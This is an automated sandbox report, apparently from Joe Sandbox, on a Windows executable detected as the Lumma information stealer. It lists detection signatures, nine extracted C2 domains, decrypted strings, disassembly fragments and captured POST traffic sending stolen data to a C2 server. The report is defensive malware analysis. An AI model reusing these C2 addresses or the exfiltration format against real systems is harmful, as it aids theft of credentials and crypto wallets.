Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1429095
MD5:	b09198b2d83af5e3d6c58d710d4192e0
SHA1:	f0793f1b004eb60f51c21dcdaade6df86c1419db
SHA256:	80f337e35d324639f217f8b36c13d906ab3c8aa4917c0ba1a7b09f52ae3c9a0c
Tags:	exe
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Yara detected LummaC Stealer

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

LummaC encrypted strings found

Machine Learning detection for sample

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Searches for user specific document files

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

file.exe (PID: 4192 cmdline: "C:\Users\user\Desktop\file.exe" MD5: B09198B2D83AF5E3D6C58D710D4192E0)

WerFault.exe (PID: 6980 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4192 -s 488 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 6960 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4192 -s 1552 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://darktrace.com/blog/the-rise-of-the-lumma-info-stealer https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-lummac2-94111d4b1e11	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["demonstationfukewko.shop", "liabilitynighstjsko.shop", "alcojoldwograpciw.shop", "incredibleextedwj.shop", "shortsvelventysjo.shop", "shatterbreathepsw.shop", "tolerateilusidjukl.shop", "productivelookewr.shop", "strollheavengwu.shop"], "Build id": "P6Mk0M--key"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1890444980.0000000001A6F000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1570:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.1890767456.0000000003680000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
Process Memory Space: file.exe PID: 4192	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 4192	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0.3.file.exe.36f0000.0.raw.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["demonstationfukewko.shop", "liabilitynighstjsko.shop", "alcojoldwograpciw.shop", "incredibleextedwj.shop", "shortsvelventysjo.shop", "shatterbreathepsw.shop", "tolerateilusidjukl.shop", "productivelookewr.shop", "strollheavengwu.shop"], "Build id": "P6Mk0M--key"}

Multi AV Scanner detection for domain / URL

Source: https://strollheavengwu.shop/api

Virustotal: Detection: 10%

Perma Link

Multi AV Scanner detection for submitted file

Source: file.exe	ReversingLabs: Detection: 44%
Source: file.exe	Virustotal: Detection: 47%			Perma Link

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.1890767456.0000000003680000.00000040.00001000.00020000.00000000.sdmp	String decryptor: demonstationfukewko.shop
Source: 00000000.00000002.1890767456.0000000003680000.00000040.00001000.00020000.00000000.sdmp	String decryptor: liabilitynighstjsko.shop
Source: 00000000.00000002.1890767456.0000000003680000.00000040.00001000.00020000.00000000.sdmp	String decryptor: alcojoldwograpciw.shop
Source: 00000000.00000002.1890767456.0000000003680000.00000040.00001000.00020000.00000000.sdmp	String decryptor: incredibleextedwj.shop
Source: 00000000.00000002.1890767456.0000000003680000.00000040.00001000.00020000.00000000.sdmp	String decryptor: shortsvelventysjo.shop
Source: 00000000.00000002.1890767456.0000000003680000.00000040.00001000.00020000.00000000.sdmp	String decryptor: shatterbreathepsw.shop
Source: 00000000.00000002.1890767456.0000000003680000.00000040.00001000.00020000.00000000.sdmp	String decryptor: tolerateilusidjukl.shop
Source: 00000000.00000002.1890767456.0000000003680000.00000040.00001000.00020000.00000000.sdmp	String decryptor: productivelookewr.shop
Source: 00000000.00000002.1890767456.0000000003680000.00000040.00001000.00020000.00000000.sdmp	String decryptor: strollheavengwu.shop
Source: 00000000.00000002.1890767456.0000000003680000.00000040.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.1890767456.0000000003680000.00000040.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.1890767456.0000000003680000.00000040.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000002.1890767456.0000000003680000.00000040.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.1890767456.0000000003680000.00000040.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000002.1890767456.0000000003680000.00000040.00001000.00020000.00000000.sdmp	String decryptor: P6Mk0M--key

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_004162D6 CryptUnprotectData,

0_2_004162D6

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.400000.0.unpack

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 104.21.15.198:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.15.198:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.15.198:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.15.198:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.15.198:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.15.198:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.15.198:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.15.198:443 -> 192.168.2.4:49737 version: TLS 1.2

Source:	Binary string: C:\motozakaroser-nuxowarosa\hic27\bivutunub.pdb source: file.exe
Source:	Binary string: H"C:\motozakaroser-nuxowarosa\hic27\bivutunub.pdb source: file.exe

Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, dword ptr [esp+0Ch]	0_2_0043B3B0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov edi, dword ptr [esi+000000B8h]	0_2_00410565
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp word ptr [eax+edi+02h], 0000h	0_2_004156B6
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp word ptr [eax+edi+02h], 0000h	0_2_004156B6
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], FD72A8C7h	0_2_00438879
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 0E17900Bh	0_2_00437998
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 0E17900Bh	0_2_00437998
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov edx, dword ptr [esp+0Ch]	0_2_00435B8B
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esp]	0_2_0041CC60
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp word ptr [ebx+esi+02h], 0000h	0_2_0041CC60
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, dword ptr [esp+08h]	0_2_0043AE80
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp word ptr [ebx+ecx+02h], 0000h	0_2_0041AFE0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_0041AFE0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, dword ptr [esp+08h]	0_2_0043B060
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, ebx	0_2_00426097
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esi+1Ch]	0_2_00426097
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	0_2_0040D160
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp byte ptr [edi], 00000000h	0_2_0041210C
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], dx	0_2_0041B1E0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp ecx	0_2_0043A182
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp ecx	0_2_0043A190
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_004222E7
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_004222ED
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp eax	0_2_00439389
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp eax	0_2_00422422
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, dword ptr [esi+40h]	0_2_004134B2
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edi, bl	0_2_0043A5D0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, dword ptr [esi+70h]	0_2_004245D4
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov edi, dword ptr [esi+000000B8h]	0_2_00410565
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, dword ptr [esi+70h]	0_2_00424678
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, dword ptr [esi+70h]	0_2_004245A8
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, dword ptr [esp+08h]	0_2_0043B6A0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then lea eax, dword ptr [eax+eax*4]	0_2_004088F0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, dword ptr [esp+0Ch]	0_2_0043B9D0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ecx, byte ptr [edx+edi]	0_2_0043B9D0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, edi	0_2_004069B4
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00417A65
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp eax	0_2_00417A1A
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then inc eax	0_2_0041DB22
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov edi, dword ptr [esp]	0_2_00407C70
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov esi, dword ptr [eax+ebx*4]	0_2_00407C70
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esi+10h]	0_2_00437D40
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, dword ptr [esp+08h]	0_2_0043AD70
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ebx, ecx	0_2_00410D77
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov dword ptr [esi+000005F0h], 00000000h	0_2_00410D77
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ebx, eax	0_2_00402D10
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00412E93
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then inc eax	0_2_00438F6A
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then inc ebx	0_2_00414FC0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	0_2_00431F80
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp byte ptr [edi], 00000000h	0_2_03692373
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp ecx	0_2_036BA3E9
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp ecx	0_2_036BA3F7
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	0_2_0368D3C7
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp word ptr [ebx+ecx+02h], 0000h	0_2_0369B247
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_0369B247
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then inc ebx	0_2_03695227
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, ebx	0_2_036A62FE
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esi+1Ch]	0_2_036A62FE
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, dword ptr [esp+08h]	0_2_036BB2C7
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	0_2_036B21E7
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then inc eax	0_2_036B91D1
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, dword ptr [esp+08h]	0_2_036BB0E7
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_036930FA
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, dword ptr [esi+40h]	0_2_03693719
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov edi, dword ptr [esi+000000B8h]	0_2_036907CC
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, dword ptr [esp+0Ch]	0_2_036BB617
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp eax	0_2_036A2689
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_036A254E
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_036A2554
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp eax	0_2_036B95F0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], dx	0_2_0369B447
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then lea eax, dword ptr [eax+eax*4]	0_2_03688B57
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 0E17900Bh	0_2_036B7BFF
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 0E17900Bh	0_2_036B7BFF
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then inc eax	0_2_0369DA12
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], FD72A8C7h	0_2_036B8AE0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, dword ptr [esi+70h]	0_2_036A480F
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, dword ptr [esp+08h]	0_2_036BB907
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp word ptr [eax+edi+02h], 0000h	0_2_0369591D
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp word ptr [eax+edi+02h], 0000h	0_2_0369591D
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp word ptr [ebx+esi+02h], 0000h	0_2_0369B917
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, dword ptr [esi+70h]	0_2_036A483B
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edi, bl	0_2_036BA837
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, dword ptr [esi+70h]	0_2_036A48DF
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ebx, eax	0_2_03682F77
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ebx, ecx	0_2_03690FDE
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov dword ptr [esi+000005F0h], 00000000h	0_2_03690FDE
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, dword ptr [esp+08h]	0_2_036BAFD7
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esi+10h]	0_2_036B7FA7
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [esp]	0_2_0369CEC7
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp word ptr [ebx+esi+02h], 0000h	0_2_0369CEC7
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov edi, dword ptr [esp]	0_2_03687ED7
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov esi, dword ptr [eax+ebx*4]	0_2_03687ED7
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov edx, dword ptr [esp+0Ch]	0_2_036B5DF2
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, dword ptr [esp+0Ch]	0_2_036BBC37
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ecx, byte ptr [edx+edi]	0_2_036BBC37
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_03697CCC
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp eax	0_2_03697C81

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: demonstationfukewko.shop
Source: Malware configuration extractor	URLs: liabilitynighstjsko.shop
Source: Malware configuration extractor	URLs: alcojoldwograpciw.shop
Source: Malware configuration extractor	URLs: incredibleextedwj.shop
Source: Malware configuration extractor	URLs: shortsvelventysjo.shop
Source: Malware configuration extractor	URLs: shatterbreathepsw.shop
Source: Malware configuration extractor	URLs: tolerateilusidjukl.shop
Source: Malware configuration extractor	URLs: productivelookewr.shop
Source: Malware configuration extractor	URLs: strollheavengwu.shop

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: strollheavengwu.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: strollheavengwu.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18161Host: strollheavengwu.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8782Host: strollheavengwu.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20435Host: strollheavengwu.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 5448Host: strollheavengwu.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1398Host: strollheavengwu.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 573232Host: strollheavengwu.shop

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: unknown

DNS traffic detected: queries for: strollheavengwu.shop

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: strollheavengwu.shop

Source: file.exe, 00000000.00000003.1682266354.0000000004223000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: file.exe, 00000000.00000003.1682266354.0000000004223000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: file.exe, 00000000.00000003.1682266354.0000000004223000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: file.exe, 00000000.00000003.1682266354.0000000004223000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 00000000.00000003.1682266354.0000000004223000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 00000000.00000003.1682266354.0000000004223000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: file.exe, 00000000.00000003.1682266354.0000000004223000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: file.exe, 00000000.00000003.1682266354.0000000004223000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000000.00000003.1682266354.0000000004223000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Amcache.hve.3.dr	String found in binary or memory: http://upx.sf.net
Source: file.exe, 00000000.00000003.1682266354.0000000004223000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: file.exe, 00000000.00000003.1682266354.0000000004223000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: file.exe, 00000000.00000003.1665105671.0000000004248000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000003.1691890634.000000000420B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: file.exe, 00000000.00000003.1691890634.000000000420B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: file.exe, 00000000.00000003.1665105671.0000000004248000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.1665105671.0000000004248000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.1665105671.0000000004248000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000003.1691890634.000000000420B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: file.exe, 00000000.00000003.1691890634.000000000420B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000003.1665105671.0000000004248000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.1665105671.0000000004248000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.1665105671.0000000004248000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: file.exe, 00000000.00000003.1691890634.000000000420B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: file.exe, 00000000.00000003.1692107511.000000000420F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1693979502.000000000420F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1692942051.000000000420F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://strollheavengwu.shop/
Source: file.exe, 00000000.00000003.1733642264.0000000004208000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1891077246.0000000004208000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1713248842.0000000004205000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://strollheavengwu.shop/#
Source: file.exe, 00000000.00000003.1701771883.000000000420F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1701569967.000000000420C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1701526477.0000000004209000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://strollheavengwu.shop/%%;
Source: file.exe, 00000000.00000003.1664402054.0000000001ACB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://strollheavengwu.shop/%;
Source: file.exe, 00000000.00000003.1673421528.000000000420F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://strollheavengwu.shop/3&
